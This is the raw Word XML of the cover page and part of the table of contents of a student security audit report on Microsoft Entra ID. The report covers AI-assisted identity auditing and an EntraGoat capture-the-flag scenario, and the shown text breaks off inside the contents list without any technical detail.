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9C7F6" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00530310">
      <w:pPr>
        <w:spacing w:before="1600"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32D92E44" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="005150F8" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="BF4E14" w:themeColor="accent2" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005150F8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="BF4E14" w:themeColor="accent2" w:themeShade="BF"/>
          <w:spacing w:val="20"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SECURITY AUDIT REPORT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D0B0F5" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00530310">
      <w:pPr>
        <w:spacing w:before="300"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71218111" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="0B1F3A"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Chat with Entra(Goat)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D614FC1" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="500"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:color w:val="1E3A5F"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>AI-Driven Identity Security Assessment — Microsoft Entra ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="093D6C38" w14:textId="77777777" w:rsidR="00530310" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="2200"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="6B7280"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:color w:val="6B7280"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Module 3 — Project 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B8CBC72" w14:textId="77777777" w:rsidR="00B37703" w:rsidRPr="00DC1FF9" w:rsidRDefault="00B37703">
      <w:pPr>
        <w:spacing w:before="2200"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E330252" w14:textId="2BC8721C" w:rsidR="00B37703" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="6B7280"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B37703">
        <w:rPr>
          <w:noProof/>
          <w:color w:val="6B7280"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Prepared by</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7729E3EE" w14:textId="77777777" w:rsidR="00C66B64" w:rsidRPr="00B37703" w:rsidRDefault="00C66B64">
      <w:pPr>
        <w:spacing w:before="120"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="6B7280"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="146D504D" w14:textId="7861D486" w:rsidR="00530310" w:rsidRPr="00B37703" w:rsidRDefault="00000000" w:rsidP="00B37703">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="1" w:color="C00000"/>
        </w:pBdr>
        <w:spacing w:before="120"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Papyrus" w:hAnsi="Papyrus"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="6B7280"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B37703">
        <w:rPr>
          <w:rFonts w:ascii="Papyrus" w:hAnsi="Papyrus"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="6B7280"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Hany Dhannoon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63FDEFCC" w14:textId="77777777" w:rsidR="00B37703" w:rsidRPr="00DC1FF9" w:rsidRDefault="00B37703">
      <w:pPr>
        <w:spacing w:before="120"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="114F1115" w14:textId="77777777" w:rsidR="00B4271D" w:rsidRDefault="00B4271D">
      <w:pPr>
        <w:spacing w:before="120"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="6B7280"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F959C68" w14:textId="77777777" w:rsidR="00C66B64" w:rsidRDefault="00C66B64">
      <w:pPr>
        <w:spacing w:before="120"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="6B7280"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40AE570A" w14:textId="1D1A28A2" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:color w:val="6B7280"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Cybersecurity Fundamentals — Applied Penetration Testing Track</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4DF5E4" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:color w:val="6B7280"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>October 2026</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78DF352B" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2607B0E1" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00530310">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sectPr w:rsidR="00530310" w:rsidRPr="00DC1FF9">
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="708" w:footer="708" w:gutter="0"/>
          <w:cols w:space="720"/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10195DC4" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="berschrift1"/>
        <w:spacing w:before="400"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc243301418"/>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Table of Contents</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:alias w:val="Table of Contents"/>
        <w:id w:val="1156653120"/>
      </w:sdtPr>
      <w:sdtContent>
        <w:p w14:paraId="67FFD4E7" w14:textId="2DECB2F3" w:rsidR="00DB1996" w:rsidRDefault="00000000">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r w:rsidRPr="00DC1FF9">
            <w:rPr>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="00DC1FF9">
            <w:rPr>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:instrText>TOC \h \o "1-2"</w:instrText>
          </w:r>
          <w:r w:rsidRPr="00DC1FF9">
            <w:rPr>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc243301418" w:history="1">
            <w:r w:rsidR="00DB1996" w:rsidRPr="00624482">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Table of Contents</w:t>
            </w:r>
            <w:r w:rsidR="00DB1996">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00DB1996">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00DB1996">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc243301418 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00DB1996">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00DB1996">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00DB1996">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="00DB1996">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5C978486" w14:textId="63F8589E"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19" w:history="1">
            <w:r w:rsidRPr="00624482">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>1. Executive Summary</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc243301419 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3BC3E405" w14:textId="6595F396"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20" w:history="1">
            <w:r w:rsidRPr="00624482">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>2. Stage-by-Stage Detail</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc243301420 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="650F5766" w14:textId="79D49A2F" w:rsidR="00DB1996" w:rsidRDefault="00DB1996">
          <w:pPr>
            <w:pStyle w:val="Verzeichnis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21" w:history="1">
            <w:r w:rsidRPr="00624482">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Stage 0 — AI Playground</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc243301421 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1898DE1E" w14:textId="6FBFD19B" w:rsidR="00DB1996" w:rsidRDefault="00DB1996">
          <w:pPr>
            <w:pStyle w:val="Verzeichnis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22" w:history="1">
            <w:r w:rsidRPr="00624482">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Stage 1 — Connect to Entra</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc243301422 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3B8DD441" w14:textId="1E86441A" w:rsidR="00DB1996" w:rsidRDefault="00DB1996">
          <w:pPr>
            <w:pStyle w:val="Verzeichnis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23" w:history="1">
            <w:r w:rsidRPr="00624482">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Stage 2 — Agent Data Access</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc243301423 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4B1493A9" w14:textId="3D7D47D8" w:rsidR="00DB1996" w:rsidRDefault="00DB1996">
          <w:pPr>
            <w:pStyle w:val="Verzeichnis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24" w:history="1">
            <w:r w:rsidRPr="00624482">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Stage 3 — Audit Logic</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc243301424 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6F719043" w14:textId="6B7043F8" w:rsidR="00DB1996" w:rsidRDefault="00DB1996">
          <w:pPr>
            <w:pStyle w:val="Verzeichnis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25" w:history="1">
            <w:r w:rsidRPr="00624482">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Stage 4 — EntraGoat (this report's focus)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc243301425 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="72B83A52" w14:textId="24A55AE9"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26" w:history="1">
            <w:r w:rsidRPr="00624482">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>3. Project Architecture</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc243301426 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="20A24FDB" w14:textId="11B1E667"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27" w:history="1">
            <w:r w:rsidRPr="00624482">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>4. Entra ID Access Configuration</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc243301427 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0DDE45F9" w14:textId="79283941"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28" w:history="1">
            <w:r w:rsidRPr="00624482">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>5. Automated Audit Checks (Stage 3)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc243301428 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="232F2AE4" w14:textId="2A88A04C"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29" w:history="1">
            <w:r w:rsidRPr="00624482">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>6. EntraGoat Scenario 1 — Misowned and Dangerous</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc243301429 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="638D209A" w14:textId="2D4C0E60" w:rsidR="00DB1996" w:rsidRDefault="00DB1996">
          <w:pPr>
            <w:pStyle w:val="Verzeichnis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30" w:history="1">
            <w:r w:rsidRPr="00624482">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>6.1 The Walkthrough</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc243301430 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3828A17E" w14:textId="2735F156" w:rsidR="00DB1996" w:rsidRDefault="00DB1996">
          <w:pPr>
            <w:pStyle w:val="Verzeichnis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31" w:history="1">
            <w:r w:rsidRPr="00624482">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>6.1.1 Detailed Walkthrough with Evidence</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc243301431 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="09C827AF" w14:textId="2E8892C8" w:rsidR="00DB1996" w:rsidRDefault="00DB1996">
          <w:pPr>
            <w:pStyle w:val="Verzeichnis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32" w:history="1">
            <w:r w:rsidRPr="00624482">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>6.2 The Flag</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc243301432 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
